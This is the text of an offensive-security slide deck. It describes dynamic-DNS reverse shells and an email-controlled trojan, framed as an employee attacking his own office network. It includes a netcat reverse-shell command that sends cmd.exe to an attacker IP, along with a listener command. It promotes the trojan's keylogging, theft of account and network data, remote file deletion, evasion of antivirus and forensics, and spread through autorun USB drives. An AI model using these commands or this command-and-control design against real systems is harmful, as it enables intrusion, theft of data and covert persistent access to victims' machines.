Handle Explotion of Remote System

Without Being Online !!

By

Merchant Bhaumik

Who Am I ?

• Currently Helping local law-enforcement And HelpingIn Securing Some Government Websites

• Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection )

• Communicating with Metasploit Guys To Develop TermCalled “ Universal Payload”

Presentation Flow…….

•Reverse Shell Using Dynamic-Dns Concepts

• Getting Data From Victim Computer Using EmailTool

We Will Understand This Mechanism By Considering

One Scenario……..

Jack’s Situaion……….Jack Working In A Company ...............!

In Which All Computers Behind The NAT BOX……. ………………………!

And He Just Decided To Break One Of TheSystem Of His Office And Getting Shell FromOffice To Home Computer

Problems For Jack….

•Company Has NIDS/IPS ( Network IDS ) …..So No In Bound Connections………….

•He Don’t Know What IP Address IsAllocated By His ISP

•He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic

Good Thing For Jack….

• Jack’s Office Allow Him To Access His GmailAccount..N Allow Some OutBound Traffic..

I

# INCLUDE< REVERSE SHELL >

Why Reverse Shell ?

•Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc

• Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound ……

• Jack Has DMZ Network In His Office…..

Diagram 1

INTERNET

192.168.1.2

192.168.1.1

192.168.1.3

192.168.1.4

192.168.1.5

117.254.4.123( PUBLIC IP )

49.24.3.12( INDIVIDUAL IP )

D

M

Z

Diagram 2 (Normal Attack ! )

INTERNET

192.168.1.2

192.168.1.1

192.168.1.3

192.168.1.4

117.254.4.123( PUBLIC IP )

49.24.3.12( Attacker IP )

D

M

Z

Victim

nc 49.24.3.12 4343 –e cmd.exe

Step I : Start Handler on port 4343nc –l –p 4343

Step II :

Normal Flow Of Getting Reverse

Shell

Attacker Starts Handler

Vuln. Injection N All that !

Victim Sends Reverse Shell … To Attacker Machine !..

For Reverse Shell Scenario !

Attacker Wins !

Exploit !

But What’s Wrong With Jack?

He Don’t Know What IP Address IsAllocated To His Computer

( Dynamic IP Allocation By ISPs)

Solution….

Attacker Is “Offline” But Still He Will Get Reverse Shell

My Way…….

Attacker Starts Handler

Vuln. Injection N All that !

Victim Sends Reverse Shell … To Attacker Machine !..

For Reverse Shell Scenario !

Attacker Wins !

Exploit !

Starting Handler On Local Machine Is Optional !

Flow Of Execution……Attacker !

Attack

Exe Running inVictim Machine

Attacker Update IP?

Attacker Receives Reverse Shell

Yes !!

No !!

* If Attacker is not online still the exe is up and running in remote machine and if attacker updates DNS records… The Reverse Shell Is On The Attacker’s Desk !!

Mechanism

• If the Code ( First Part ) receives positive Acknowledgement of

sending packets …………Jack Will Get Reverse Shell…………….

•Else keep running in the victim machine and waits for Ack.

From attacker’ machine…

Dynamic DNS Way…. (Initially ! )• First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 )

First Part

Second Part

SynchronousExecution

( Single EXE )

NEW FINAL EXE CONSIST OF

New.exe

Dynamic DNS Way…. (Finally ! )• First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP )

First Part

Second Part

SynchronousExecution

( Single EXE )

NEW FINAL EXE CONSIST OF

New.exe

Metasploit………….!!!!!•You can embed my method (or My Exe ) with metasploit Payload which is of yourchoice . * The Structure of new Exe will be as per follow :

My Tool

MSF PAYLOAD( LHOST = Dynamic )

SynchronousExecution

( Single EXE )

NEW FINAL EXE CONSIS OF

New.exe

Hands On NetWork

INTERNET

192.168.1.2

192.168.1.1

192.168.1.3

192.168.1.4

192.168.1.5

117.254.4.123( PUBLIC IP )

49.24.3.12( INDIVIDUAL IP )

D

M

Z

Time To Enjoy Cooked Cookies And

Recipes !!

Demo

I I

# INCLUDE <EMAIL TOOL >

Normal Remote Trojans & Viruses !

Attacker

(Must Be Online !)

Victim

(Must Be Online !)

My Tool !!

Attacker

MAY

OR

MAY NOT ONLINE !!

Victim

MAY

OR

MAY NOT ONLINE !!

Caution: No Need To Be Online !!

Attackers !!

So, How It Works ??

Attacker Victim

Zombie

But, Who Is Zombie??

@ It may be one of the below :

It is one of like it…….

Or one like this…..

Or like this…….

Features !!

Execute Operating System Level Commands By Using Emails !

Get all Network Card Information with Allocated IP Addresses !

Live Tracking Of the System being used by victim !

Get All available account‟ List !

Enable/Disable Key Logger !

This All Stuff With Gmail , Yahoo , Hotmail………!!

About It !It is a simple application which Once Up & Going on Victim‟

Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail

Email Services…

There is no need to be Online for Attacker to attack the Victim

System…..

Attacker Has to send attack instructions to Any of the mail

service & then it is like sitting on the door & watching the event ,

“ when it‟s gonna open !!”

As Victim Connects to the internet …. Attack Launches & the

results are automatically sent back to the Attacker‟s email

Address…..

Cool Benefits !!

If the email account is used by using One of like below then it is totally Anti-

Forensic ! No Reverse Detection Is Possible !

Create Unique password for all individual victims who are

infected …

Ability to handle multiple clients simultaneously …..

Delete Files In Victims Computer by Simply Sending An Email..

No Antivirus Can Detect Attack Because Of HTTPS ……

Tool Syntax …..

Password_For_Victim “: “Task_Commands”:”

E.g. Pwd$98$ : Account_info :

“Pwd$98$” is Password

For The Particular Victim…

Command Which Sends back

Email Containing Account Info In

Victim Computer !

Snap Shot 1…(Load Attack Instructions)

Send Account info Of Victim..

Send Drive Info Of Victim…

Sends Mac , Network card Info...

Password For Individual Victim

Snap Shot 2…(Get Back Attack Result)

My Emaill Account …… !

Attached Info Of Victims Computer…!

As Per Of Attacker‟ Choice

Why Gmail ??

No Fear Of Detection 1

No Direct Connection Between Attacker & Victim

Attacker

Victim

No Fear Of Detection 2

No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It

Self…….!

How To Spread This Code??

Autorun.inf by USB Drives……….

Phisical Access Of Victim‟s System…..

During Metasploit Explotion ……

Further Possible Development !!

This Code Is Flexible Enough To Develop Further By My Hacker

Friends….It Is Also Possible For Future To Send Exploits Or

Trojans By Using This Code…….

Any One Can Send Exploits , Trojans , RootKits , BackDoors By

Simply Attaching It With Email And Sending It To His Own Account

Or Account That is Configured In Victim‟ Code………

Pros N Cons 1 ! ( Be Transparent !! )

Advantages are that the attacker never goin to caught if he/she

using the browser like TOR , Anononymizer , VPNs or Any

PROXy…. For accessing the attacking gmail account.

No Antivirus can detect the Instruction data because all traffic

gonna come from HTTPS …..!

Only single email account of gmail goin to use for both the side.

Attacker and victim machine both goin to connect same account

but attacker knows ,But Victim Don‟t !!

Pros N Cons 2

Disadvantage is that , if the victim has habit of checking the

current connections using commands like „netstat –n‟ then

possibility to detect Gmail connection when actually there is no

browser activity. But still it is difficult to detect ………. Because

process is running in Hidden mode….

Hands On Time..!

( Demo)

For More……

backdoor.security@gmail.com

Thanks Guys

For Checking

It Out …….!